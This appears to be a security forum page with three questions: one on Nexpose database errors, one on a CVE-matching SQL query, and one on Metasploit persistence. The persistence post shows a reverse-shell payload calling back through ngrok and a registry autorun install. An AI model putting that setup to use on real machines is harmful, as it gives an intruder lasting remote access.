Knowledge Base

Questions

1

Reverse TCP persistence doesn't work over internet

Hey guys. I've been playing around with some reverse shells on a couple virtual machines and I've recently gotten it to work over the internet using ngrok to port forward to my local computer, which works great, except for the fact that the "run persistence" attack doesn't work. I've never had problems with "run persistence" when testing on a local network. The command will execute and go through without any errors and it also installs the persistence files on the target, but it doesn't actually execute the persistence script on the target and doesn't report back once the user reboots. If I manually click on the .vbs file on the target, then it'll work and it'll reconnect if I exit the session, so the settings should be good. It still doesn't run the script on start up though.

This is the command I run:

    run persistence -r (IP) -p (port) -i 5 -U -X

This is the output:

    [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
    [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
    [*] Running Persistence Script
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DESKTOP-VH5Q39J_20180216.4315/DESKTOP-VH5Q39J_20180216.4315.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11086
    [*] Persistent agent script is 99634 bytes long
    [+] Persistent Script written to C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs
    [*] Executing script C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs
    [+] Agent executed with PID 4500
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW
    [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW

What's going on? How do I get it to work? I would really appreciate if you guys could help me out! Thanks in advance!

Posted by Ernst Reberto 10 months ago

1

Nexpose nxpgsql FATAL semctl()

Hi. This is a problem for me:

"The Security Console is running in maintenance mode, which enables it to perform necessary internal tasks or to recover from the critical failure of one or more of its subsystems. You will not be able to run scans or generate reports while the Security Console is in maintenance mode. For more information, please see the topic Running VM in Maintenance Mode in the VM Administrator's Guide"

nsc.log:

    2018-02-13T11:09:26 [INFO] [Thread: Security Console] Creating NSC config for database type postgresql.
    2018-02-13T11:09:26 [INFO] [Thread: Security Console] Starting up postgresql DB system
    2018-02-13T11:09:26 [INFO] [Thread: Security Console] PostgreSQL service status: 0.
    2018-02-13T11:09:27 [INFO] [Thread: Security Console] PostgreSQL service status: 1.
    2018-02-13T11:09:28 [ERROR] [Thread: Security Console] A critical error occured during initialization
    org.postgresql.util.PSQLException: FATAL: semctl(12582919, 3, SETVAL, 0) failed: Invalid argument
        at org.postgresql.core.v3.ConnectionFactoryImpl.doAuthentication(ConnectionFactoryImpl.java:443) ~[postgresql-9.4.1212.jar:9.4.1212]
        at org.postgresql.core.v3.ConnectionFactoryImpl.openConnectionImpl(ConnectionFactoryImpl.java:217) ~[postgresql-9.4.1212.jar:9.4.1212]
        at org.postgresql.core.ConnectionFactory.openConnection(ConnectionFactory.java:52) ~[postgresql-9.4.1212.jar:9.4.1212]
        at org.postgresql.jdbc.PgConnection.<init>(PgConnection.java:216) ~[postgresql-9.4.1212.jar:9.4.1212]

Any suggestions? Thanks.

Posted by John Sartana 10 months ago

1

SQL for vulnerability report against CVE

I need help with the following query, which checks vulnerabilities against Robot. I am also pulling asset group and Fix. The query runs but the results don't match my dynamic asset group - the number of assets with vulnerabilities from the query doesn't match the number of assets in the dynamic asset group for Robot.

Below is the query:

    SELECT dsi.name AS site, dag.name AS asset_group, da.ip_address, da.host_name,
           dv.title, dv.description, favi.port, dos.description AS operating_system,
           favi.key, da.last_assessed_for_vulnerabilities AS last_scanned,
           favi.date AS scan_finished,
           proofAsText(ds.fix) AS solution, proofAsText(favi.proof) AS proof
    FROM fact_asset_vulnerability_instance favi
    JOIN dim_vulnerability_solution dvs USING (vulnerability_id)
    JOIN dim_vulnerability dv USING (vulnerability_id)
    JOIN dim_asset da USING (asset_id)
    JOIN dim_operating_system dos USING (operating_system_id)
    JOIN dim_solution ds USING (solution_id)
    JOIN dim_site_asset dsa USING (asset_id)
    JOIN dim_site dsi USING (site_id)
    JOIN dim_asset_group_asset daga USING (asset_id)
    JOIN dim_asset_group dag USING (asset_group_id)
    WHERE dv.title ILIKE '%2017-6168%'
       OR dv.title ILIKE '%2017-17382%'
       OR dv.title ILIKE '%2017-17427%'
       OR dv.title ILIKE '%2017-17428%'
       OR dv.title ILIKE '%2017-12373%'
       OR dv.title ILIKE '%2017-%13098'
       OR dv.title ILIKE '%2017-%1000385'
       OR dv.title ILIKE '%2017-%13099'
       OR dv.title ILIKE '%2017-%17841'
       OR dv.title ILIKE '%2017-%6883'
       OR dv.title ILIKE '%2017-%5081'
       OR dv.description ILIKE '%2017-6168%'
       OR dv.description ILIKE '%2017-17382%'
       OR dv.description ILIKE '%2017-17427%'
       OR dv.description ILIKE '%2017-17428%'
       OR dv.description ILIKE '%2017-12373%'
       OR dv.description ILIKE '%2017-%13098%'
       OR dv.description ILIKE '%2017-%1000385%'
       OR dv.description ILIKE '%2017-%13099%'
       OR dv.description ILIKE '%2017-%17841%'
       OR dv.description ILIKE '%2016-%6883%'
       OR dv.description ILIKE '%2012-%5081%'

Posted by Kheun Chan 10 months ago